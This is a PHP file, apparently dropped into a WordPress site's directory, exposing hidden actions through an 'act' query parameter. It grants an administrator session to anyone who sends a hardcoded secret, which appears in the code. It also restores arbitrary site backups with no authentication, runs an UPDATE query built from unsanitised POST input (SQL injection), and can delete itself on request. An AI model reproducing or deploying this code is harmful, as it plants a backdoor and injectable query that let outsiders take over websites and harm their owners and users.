HEX

File: /opt/aphex/sites/casinoqa.com/wp-aphex.php
<?php

if (!file_exists('index.php')) {
    header("HTTP/1.0 404 Not Found");
    exit;
}

ob_start();
//require_once 'index.php';
//require_once './wp-admin/index.php';

$bah = ob_get_contents();
$root = $_SERVER['DOCUMENT_ROOT'];
require_once($root .  '/wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/plugin-install.php');
require_once(ABSPATH . 'wp-admin/includes/file.php');
require_once(ABSPATH . 'wp-admin/includes/misc.php');
require_once(ABSPATH . 'wp-admin/includes/plugin.php');
require_once(ABSPATH . 'wp-admin/includes/class-wp-upgrader.php');
ob_end_clean();

const APHEX_INSTALLER = true;
$version = 1.0;
$body = null;
$auth = '20xehpa19';
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $body = json_decode(file_get_contents('php://input'), true);
}

switch ($_GET['act'] ?? '') {
    case 'ping':
        echo json_encode(
            [
                'success' => true,
                'msg' => 'polo',
                'v' => $version,
            ]
        );
        exit;
        break;
    case 'restore':
        if (!class_exists('Ai1wm_Import_Controller')) {
            $return = [
                'success' => false,
                'error' => 'Ai1wm could not be found'
            ];
            echo json_encode($return);
            exit;
        }
        $params = [];
        $params['storage'] = ai1wm_storage_folder();
        $params['ai1wm_manual_restore'] = 1;
        $params['archive'] = $body['backup-file'];
        $params['secret_key'] = get_option(AI1WM_SECRET_KEY, false);
        add_filter('ai1wm_completed_timeout', '__return_zero');

        $params = Ai1wm_Import_Controller::import($params);
        exit;
        break;
    case 'disappear':
        unlink(__FILE__);
        echo 'Alrighty then, ta-ta.' . PHP_EOL;
        break;
    case 'admin-login':
        if (!isset($_POST['authorization']) || $_POST['authorization'] != '20xehpa19') {
            exit;
        }
        require('wp-blog-header.php');
        require('wp-includes/pluggable.php');

        $user_info = get_userdata(1);

        // Try to find an admin if we do not have any admin with ID => 1
        if (empty($user_info) || empty($user_info->user_login)) {
            $admin_id = get_users(array('role__in' => array('administrator'), 'number' => 1, 'fields' => array('ID')));
            $user_info = get_userdata($admin_id[0]->ID);
        }

        $username = $user_info->user_login;
        $user = get_user_by('login', $username);

        // Create the session
        if (!is_wp_error($user)) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID);
        }
        $redirect_to = admin_url();
        wp_safe_redirect($redirect_to);
        break;
    case 'change-username':
        if (!isset($_POST['authorization']) || $_POST['authorization'] != '20xehpa19') {
            exit;
        }

        if (!isset($_POST['oldUsername'], $_POST['newUsername'])) {
            echo json_encode(['success' => false, 'error' => 'Please provide oldUsername and newUsername params']);
            exit;
        }

        if (strlen($_POST['newUsername']) < 3) {
            echo json_encode(['success' => false, 'error' => 'New username must be at least 3 characters long']);
            exit;
        }

        global $wpdb, $table_prefix;
        $q = $wpdb->get_results(
            "UPDATE {$wpdb->users} SET user_login = '{$_POST['newUsername']}', user_nicename = '{$_POST['newUsername']}' WHERE user_login = '{$_POST['oldUsername']}'"
        );

        echo json_encode(
            [
                'success' => true,
                'result' => [
                    'oldUsername' => $_POST['oldUsername'],
                    'newUsername' => $_POST['newUsername'],
                ]
            ]
        );
        exit;
        break;
    default:
        header("HTTP/1.0 404 Not Found");
        exit;
        break;
}